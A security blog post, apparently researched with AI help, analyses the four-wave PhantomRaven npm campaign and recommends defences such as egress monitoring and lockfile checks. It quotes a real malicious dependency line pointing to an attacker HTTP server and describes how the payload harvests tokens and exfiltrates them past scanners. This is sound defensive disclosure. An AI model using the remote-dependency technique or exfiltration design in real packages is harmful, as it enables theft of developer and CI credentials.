PhantomRaven: How a Four-Wave npm Campaign Used Remote Dynamic Dependencies to Beat Package Scanning
Commissioned, Curated and Published by Russ. Researched and written with AI.
What’s New
Endor Labs published their full technical analysis of Waves 2-4 on 10-11 March 2026, identifying 88 new packages across three previously unreported waves. At the time of writing, 81 of those 88 packages remain live on npm. Two of the four C2 servers are still responding. On 12 March, the Wave-2 payload was silently replaced with a console.log('Hello, world!') – demonstrating exactly why URL dependencies are a structural risk: the author changed what every dependent package executes without publishing a single update.
Changelog
| Date | Summary |
|---|---|
| 12 Mar 2026 | Initial publication. |
In October 2025, Koi Security published a disclosure: 126 malicious npm packages, over 86,000 downloads, and a campaign they named PhantomRaven. The packages were stealing developer credentials – GitHub tokens, CI/CD secrets, email addresses from .gitconfig and .npmrc. npm pulled the packages. Case closed, apparently.
It wasn’t. Three more waves followed in November, December, and February. Endor Labs tracked them through infrastructure correlation and published their findings this week. 88 new packages. 50 disposable npm accounts. The same C2 infrastructure, the same 259-line payload, the same credential-theft playbook – just different domains and a new batch of plausible package names.
The campaign is still running.
What PhantomRaven Steals
The malicious payload is 259 lines of JavaScript, and it is remarkably consistent. Across all four waves, Endor Labs found that 257 of those 259 lines are byte-for-byte identical. The only changes are the C2 URL on lines 162-163.
What those 259 lines do, once executed:
Developer email harvesting. The payload reads from four sources: environment variables, ~/.gitconfig, ~/.npmrc, and the local package.json author field. Every email address it finds goes to the attacker.
CI/CD token collection. Twenty environment variables from GitHub Actions, GitLab CI, Jenkins, and CircleCI are explicitly targeted. If you run npm install in a CI pipeline – which is nearly every pipeline – and that pipeline has any of those variables set, they’re exfiltrated.
System fingerprinting. IP address (via a call to api64.ipify.org), hostname, OS, Node version. The attacker builds a profile of every machine the package lands on.
Triple-redundant exfiltration. The data goes out via HTTP GET first, then HTTP POST, then WebSocket fallback. This layered approach is specifically designed to maximise success across varied network environments – GET bypasses POST-only inspection, POST handles URL length limits, WebSocket evades HTTP-layer firewalls. The attacker has thought about what network controls developers operate under.
The exfiltration runs silently. All console.log and console.error calls are wrapped in if (!isPreinstall) – during npm install, the terminal shows nothing while the data transfer happens in the background.
Remote Dynamic Dependencies: The Technique That Beats Static Scanning
This is the part that matters architecturally. PhantomRaven does not embed malicious code in its packages. The packages published to npm contain only a harmless Hello World script. The malicious payload lives on the attacker’s server.
Here is how the delivery works:
In a standard npm package.json, dependencies are listed with version ranges: "some-library": "^1.2.0". npm resolves these from the registry. PhantomRaven instead specifies an HTTP URL: "ui-styles-pkg": "http://npm.jpartifacts.com/npm/jam3". npm’s own resolution mechanism fetches a tarball from that URL during install. The tarball contains the payload, which executes via a preinstall hook.
The npm package itself is clean. Any tool that scans the package contents finds nothing – because there is nothing to find. The malicious code arrives at install time from an external server, fetched by npm’s own dependency resolution, not by any attacker-controlled process running in the package.
This is what Koi Security called Remote Dynamic Dependencies (RDD). It is not a novel idea – pulling second-stage payloads from external servers is common in malware. What makes RDD specifically interesting is that it delegates the download to npm’s own infrastructure. npm is doing the fetch. The package just has an unusual dependency URL.
The consequence for tooling is concrete: npm audit analyses packages in the registry against known vulnerability data – it does not evaluate whether a dependency URL points to an attacker’s server. Snyk and Socket scan package code for suspicious patterns. A package whose entire malicious surface is an HTTP URL in a dependency field passes most of those checks.
Endor Labs detected PhantomRaven not by scanning package contents but by following external dependency chains and correlating infrastructure signals – the domains containing “artifact”, the identical WHOIS fingerprints, the no-TLS HTTP-only C2 servers. Detection required looking at what the packages fetched, not what they contained.
The March 12 event makes the structural risk explicit. When the Wave-2 C2 payload was replaced with console.log('Hello, world!'), every one of the 50 Wave-2 packages simultaneously changed what they execute on install – with zero changes to the npm registry. The author flipped a single file on one server. That is the capability RDD hands to whoever controls the C2 domain.
Why Developer Environments Are the Target
This campaign does not target production systems. It targets developer machines and CI pipelines. That is a deliberate choice, and it reflects a real asymmetry in how organisations think about privilege.
A developer machine typically has: a GitHub token with write access to the organisation’s repositories, AWS credentials that aren’t constrained to specific resources, secrets in .env files that have never been rotated because “this is just dev”, and ssh keys that work on internal infrastructure. CI pipelines have it worse – they hold the deployment keys, the cloud access, the package signing credentials that are the actual crown jewels of an organisation’s software delivery.
Production workloads run in hardened environments with constrained IAM roles, network controls, and monitored access. Developer machines run with whatever the developer installed last Tuesday. The gap in privilege control between a production EC2 instance and the laptop that deploys to it is significant, and that gap is the attack surface PhantomRaven is exploiting.
This is the same pattern as the five malicious Rust crates published earlier this year – different ecosystem, same target. Developer credential access is the objective. The ecosystem is just the delivery mechanism.
Four Waves Means a Working Operation
The timeline matters here. Koi Security disclosed Wave 1 on October 29, 2025. The attacker registered the Wave-2 C2 domain on November 4 – six days later. Wave 3 infrastructure went up February 13, three days after the last Wave-2 package. Wave 4 appeared February 18, one day after Wave 3 finished.
This is not a threat actor who published some packages, got caught, and moved on. This is someone watching their own takedowns, registering new infrastructure within days, and continuing to publish. The payload barely changed across seven months. The Wave-4 C2 tarball still has "author": "JPD" – the author never updated it, because updating it wasn’t necessary. The core technique kept working.
The operational pattern – rotating accounts, domains, and metadata while leaving the payload unchanged – suggests a threat actor who has assessed their ROI and found the campaign worth continuing. 86,000+ downloads in Wave 1. Likely more across Waves 2-4. They have developer credentials. Whether those credentials have been used for anything beyond collection is not currently known.
The infrastructure is consistent enough that Endor Labs could cluster all four waves from external signals alone: all four C2 domains registered through Amazon Registrar, all using Identity Protection Service WHOIS privacy, all on AWS Route53, all HTTP-only with zero TLS. The attacker’s operational security is good enough to stay operational across four waves, but not so good that correlation across waves is impossible.
The Broader Supply Chain Pattern
Three separate campaigns in three separate ecosystems, all in the last six months:
PhantomRaven (npm, RDD): Packages whose malicious payload lives off-registry, fetched by npm’s own resolution mechanism. Bypasses static package analysis by having nothing to analyse.
Five Rust crates (crates.io, curl): Packages that ran a straightforward curl-based exfil of .env files, combined with an AI-powered bot targeting open source maintainers via GitHub Actions. Published here.
nx supply chain tokens: Persisting credentials extracted from the Nx build system ecosystem.
Different actors, different ecosystems, different techniques – same objective. Developer credentials in CI/CD pipelines. The pattern is supply chain as credential vector. If a developer installs it, it is an attack surface. The specific package registry is secondary.
What is notable about the trajectory is that the techniques are getting harder to detect with standard tooling. The Rust crates used straightforward curl commands that a competent scanner would flag. RDD is specifically designed to put the malicious surface outside the scanner’s field of view. The defensive tooling that caught earlier campaigns is being studied and evaded.
What to Actually Do
“Run npm audit” is not sufficient. PhantomRaven was designed to pass npm audit. Here is what actually helps:
Network egress monitoring at install time. The RDD technique makes an outbound HTTP request during npm install. That request goes to a domain you have never seen before, on port 80, with no TLS. In a properly instrumented CI pipeline, that is a detectable anomaly. Log all outbound connections during the install phase. Alert on unexpected external hosts. This catches RDD in a way that package scanning cannot.
Install-time behaviour analysis. Tools like Socket have moved toward analysing what packages do rather than what they contain – network calls, file system access, environment variable reads. This is the right direction. Static analysis of package contents is insufficient for campaigns that externalize their payload.
Validate package.json dependency fields for external URLs. Before merging a package-lock.json update, check whether any dependency has been resolved from an HTTP URL rather than the npm registry. This is automatable and would flag RDD directly.
Lockfile integrity in CI. Commit package-lock.json and enforce npm ci rather than npm install in pipelines. RDD can still work within a lockfile if the lockfile is poisoned, but this reduces the surface for lockfile-bypassing attacks and is good hygiene regardless.
Treat developer machines as high-privilege identities. Short-lived credentials. Token rotation. AWS IAM roles scoped to actual requirements rather than broad dev access. This is the same advice from the pipeline hardening post, and it applies here directly. A developer machine with a 90-day-old unscoped AWS key is a more valuable target than the production system it deploys to.
Package scanning is a necessary layer of defence. It is not a sufficient one. PhantomRaven was specifically architected to defeat it – by ensuring that at the moment of scanning, there was nothing malicious to scan.
The defensive layer that catches RDD is not better static analysis. It is runtime behaviour monitoring: what does this package do when it executes, what does it connect to, what data does it read. The payload does not exist until install time. That is when you need to be looking.
Related: Five Malicious Rust Crates and an AI Bot – the same supply chain credential pattern in a different ecosystem. Also The CLINEjection Attack and AI Agent Pipeline Hardening.